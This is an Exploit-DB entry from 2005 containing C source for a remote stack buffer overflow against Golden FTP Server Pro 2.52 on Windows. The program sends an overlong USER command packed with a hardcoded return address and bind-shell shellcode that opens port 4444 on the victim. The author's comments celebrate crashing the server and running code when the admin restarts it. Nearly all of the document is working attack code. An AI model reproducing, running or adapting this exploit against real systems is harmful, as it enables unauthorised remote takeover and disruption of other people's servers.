Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)

EDB-ID:

969


Author:

darkeagle

Type:

remote


Platform:

Windows

Date:

2005-04-29


/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

#define RETADDR 0x77F510B0

char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\xbe\xc7\x48\xe7"
"\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\xbf\x7e\x96\xfb"
"\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\xbf\x7a\x2c\x4e"
"\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x79\x7f\xef\x8a"
"\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\xb2\xdf\x96\xeb"
"\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\xe1\xca\x40\xea"
"\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\xb2\x1f\x46\xad"
"\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x68\x1d\xda\x30"
"\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\xbe\x94\x1d\x21"
"\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\xf7\x12\x54\x15"
"\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x53\x68\x26\xe6"
"\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x69\x1d\xc2\x38"
"\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x41\xc1\x19\xe8"
"\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x8e\xa5\xdd\xe1"
"\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x8f\x4f\x4e\xe2"
"\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\xeb\xb0\x4e\xe6"
"\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\xfd\xd9\x59\xb1"
"\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\xe7\x67\xb6\x36"
"\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x9a\xa8\x1c\xb0"
"\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x33\xd0\x39\xa1"
"\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x41\xe1\x1d\xd9"
"\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\xcb\x94\x75\x1c"
"\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x41\x47\xe2\xc4"
"\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x41\x44\x1d";

int main ( int argc, char *argv[] )
{
WSADATA wsa;
SOCKET sock;
char data[6667], evil[7776];
struct sockaddr_in addr;

printf("\n\n >> Golden FTP Server Pro 2.52.0.0 Remote Root Exploit <<\n :: by darkeagle [unl0ck] ::\n >> http://unl0ck.org <<\n\n");

WSAStartup(MAKEWORD(2,0), &wsa);

if ( argc < 3 )
{
printf(" >usage: %s <ip> <port>\n\n", argv[0]);
exit(0);
}

printf(" [*] ip: %s, port: %d\n", argv[1], atoi(argv[2]));

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

memset(data, 0x00, sizeof(data));
memset(evil, 0x00, sizeof(evil));
memset(data, 0x55, 372);

*(long*)&data[332] = RETADDR;
memcpy(data, &shellcode, sizeof(shellcode));

printf(" [`] connecting...\n");

if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) > 0 ) { printf(" [+] connected\n"); } else { exit(0); }

sprintf(evil, "USER %s\r\nPASS\r\n", data);

Sleep(1000);
send(sock, evil, strlen(evil), 1);

printf(" [+] send. w8ing while ftpd will reboot...\n\n");

closesocket(sock);
WSACleanup();

return 0;

}

// milw0rm.com [2005-04-29]